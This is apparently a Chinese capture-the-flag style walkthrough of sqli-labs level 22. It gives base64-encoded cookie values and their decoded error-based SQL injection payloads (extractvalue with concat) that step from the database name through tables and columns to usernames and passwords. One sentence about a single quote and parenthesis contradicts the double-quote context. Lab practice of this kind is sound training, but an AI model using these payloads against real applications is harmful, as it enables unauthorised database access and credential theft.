这里来到了第一阶段的最后一关:22 关
其实跟 21 关一样,只不过变成了双引号 " 而已,直接上菜吧o( ̄▽ ̄)ブ
uname=YWRtaW4iIGFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGRhdGFiYXNlKCkpLDB4N2UpKSM=
uname=admin" and extractvalue(1,concat(0x7e,(select database()),0x7e))#
怎么猜单引号加括号,这里当你构造好 payload post 以后,会出现 BUG OFF…但是加了’)#就没有,这就才出来了。接下来直接上 payload:
–查表
uname=YWRtaW4iIGFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IHRhYmxlX25hbWUgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYT1kYXRhYmFzZSgpIGxpbWl0IDAsMSksMHg3ZSkpIw==
uname=admin" and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e))#
–查列
uname=YWRtaW4iIGFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGNvbHVtbl9uYW1lIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLmNvbHVtbnMgd2hlcmUgdGFibGVfc2NoZW1hPWRhdGFiYXNlKCkgYW5kIHRhYmxlX25hbWUgPSAndXNlcnMnIGxpbWl0IDAsMSksMHg3ZSkpIw==
uname=admin" and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name = 'users' limit 0,1),0x7e))#
–查用户名
uname=YWRtaW4iIGFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IHVzZXJuYW1lIGZyb20gdXNlcnMgbGltaXQgMCwxKSwweDdlKSkj
uname=admin" and extractvalue(1,concat(0x7e,(select username from users limit 0,1),0x7e))#
–查密码
uname=YWRtaW4iIGFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IHBhc3N3b3JkIGZyb20gdXNlcnMgbGltaXQgMCwxKSwweDdlKSkj
uname=admin" and extractvalue(1,concat(0x7e,(select password from users limit 0,1),0x7e))#
😄